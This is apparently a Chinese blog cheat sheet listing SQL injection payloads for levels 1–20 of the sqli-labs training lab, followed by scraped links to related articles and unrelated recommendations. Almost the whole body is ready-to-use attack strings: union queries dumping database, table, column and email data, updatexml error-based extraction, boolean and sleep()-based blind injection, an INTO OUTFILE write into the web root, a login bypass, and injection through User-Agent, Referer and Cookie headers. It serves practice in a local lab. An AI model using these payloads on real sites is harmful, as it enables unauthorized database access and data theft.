1、
联合查询注入:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,user(),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+

2、
同1
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3

3、
同1
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+

4、
同1
http://127.0.0.1/sqli/Less-3/?id=-1") union select 1,user(),3 --+

5、
报错注入:
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+

布尔盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ or http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+ subsur从第一个字符开始每次只返回一个
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+

时间盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+

6、
同5
http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+

7、
http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.txt"#

8、
同5 布尔或时间盲注(无错误回显,所以无法报错注入)
http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+

9、
同5 时间盲注

10、
同5 双引号闭合 时间盲注
http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+

11、
POST注入 (万能密码)
联合查询注入/报错注入/盲注??
admin' order by 3 #
1' union select user(),database() #

12、
1") union select user(),database() #

13、
报错注入
1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

14、
双引号闭合
1" and updatexml(1,concat(0x7e,database(),0x7e),1) #

15、
布尔盲注
admin' and length(database())>1 #

16、
时间盲注
admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #

17、
报错注入
username:admin
password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

18、
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

19、
Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

20、
Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #

sqlilabs 1-20关 payload的更多相关文章

  1. sqli-labs通关----11~20关

    第十一关 从第十一关开始,就开始用post来提交数据了,我们每关的目的都是获取users表下password字段的内容. post是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常 ...

  2. SQL注入之Sqli-labs系列第四十一关(基于堆叠注入的盲注)和四十二关四十三关四十四关四十五关

    0x1普通测试方式 (1)输入and1=1和and1=2测试,返回错误,证明存在注入 (2)union select联合查询 (3)查询表名 (4)其他 payload: ,( ,( 0x2 堆叠注入 ...

  3. SQL注入之Sqli-labs系列第一关

    在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sq ...

  4. sqli-labs系列——第一关

    先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象.之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关. less1 尝试and1=2 ...

  5. XSS挑战20关

    第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/ ...

  6. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  7. SQL注入之Sqli-labs系列第二关

    废话不在多说  let's go!   继续挑战第二关(Error Based- Intiger) 同样的前奏,就不截图了 ,and 1=1和and 1=2进行测试,出现报错 还原sql语句 查看源代 ...

  8. sqli-labs第5关布尔盲注pyhton脚本

    import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num ...

  9. sqli-labs系列——第二关

    less2 and 1=1有回显,and 1=2无回显,为数值型注入 order by 4–+报错,有3行 查询数据库名 ?id=0' union select 1,(select group_con ...

随机推荐

  1. Java 多线程基础(四)线程安全

    Java 多线程基础(四)线程安全 在多线程环境下,如果有多个线程在同时运行,而这些线程可能会同时运行这段代码.程序每次运行结果和单线程运行的结果是一样的,而且其他的变量的值也和预期的是一样的,就是线 ...

  2. netty集群(一)-服务注册发现

    上篇文章介绍了如何搭建一个单机版本的netty聊天室:https://www.jianshu.com/p/f786c70eeccc. 一.需要解决什么问题: 当连接数超过单机的极限时,需要将netty ...

  3. java中的引用类型:强软弱虚

    java中的引用类型共4种:强软弱虚,具体每种类型的特点和应用场景.记录下.本文是看了马士兵老师的视频后记录整理的.加深印象. 基本概念 1. 强引用 强引用是使用最普遍的引用.如果一个对象具有强引用 ...

  4. group by <grouping sets(...) ><cube(...)>

    GROUP BY      GROUPING SETS() 后面将还会写学习 with cube,  with rollup,以及将它们转换为标准的GROUP BY的子句GROUP SET(), CU ...

  5. (八)利用 Profile 构建不同环境的部署包

    接上回继续,项目开发好以后,通常要在多个环境部署,象我们公司多达5种环境:本机环境(local).(开发小组内自测的)开发环境(dev).(提供给测试团队的)测试环境(test).预发布环境(pre) ...

  6. 解决mysql插入数据l出现"the table is full"的问题

    需要修改Mysql的配置文件my.ini,在[mysqld]下添加/修改两行:tmp_table_size = 256Mmax_heap_table_size = 256M

  7. Springboot基于assembly的服务化打包

    (1)首先我们编辑 assembly.xml 配置文件,在前文的基础上新增第三方依赖设置(高亮部分),实现将第三方的 jar 包添加到压缩包里的 lib 目录: <?xml version=&q ...

  8. Beta冲刺<1/10>

    这个作业属于哪个课程 软件工程 (福州大学至诚学院 - 计算机工程系) 这个作业要求在哪里 Beta冲刺 这个作业的目标 Beta冲刺--第一天(05.19) 作业正文 如下 其他参考文献 ... B ...

  9. docker安装mysql,设置mysql初始密码

    docker安装mysql,只需要2分钟就可以完成 docker search mysql 拉取mysql镜像(https://hub.docker.com/_/mysql) docker pull ...

  10. 慕课网--docker走进第一个javaweb应用

    zh docker镜像就是一系列文件的集合 docker 容器就是一个进程.将docker镜像运行起来就是一个docker容器 docker仓库就是存储docker镜像的 1.docker的安装 do ...